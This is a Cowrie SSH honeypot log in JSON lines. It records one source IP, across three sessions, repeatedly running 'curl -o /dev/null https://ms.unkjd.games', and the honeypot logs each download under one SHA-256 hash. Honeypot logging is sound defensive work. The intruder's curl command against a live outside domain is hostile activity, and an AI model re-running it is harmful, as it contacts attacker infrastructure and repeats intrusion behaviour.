{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.821973Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.824060Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.853535Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.854541Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.855074Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.860487Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.862208Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.864615Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.866002Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.866573Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.886163Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.886928Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.891323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.893210Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.897811Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.898523Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.901488Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.919647Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.920283Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.924670Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.926334Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.927197Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.927916Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.933175Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.933731Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.961125Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.962740Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.969396Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.970143Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.972275Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.972857Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.975980Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.976739Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.006458Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.007525Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.008026Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.045749Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.046650Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.048338Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.048962Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.053839Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.056209Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.084072Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.084747Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.088433Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.089286Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.092074Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.094136Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.098410Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.099666Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.100195Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.129317Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.130075Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.135496Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.137263Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.144192Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.154717Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.155459Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.158039Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.158898Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.162290Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.165656Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.167094Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.167896Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.195857Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.197755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.199269Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.199923Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.202257Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.202827Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.204985Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.205596Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.237446Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.239883Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.240579Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.242964Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.243575Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
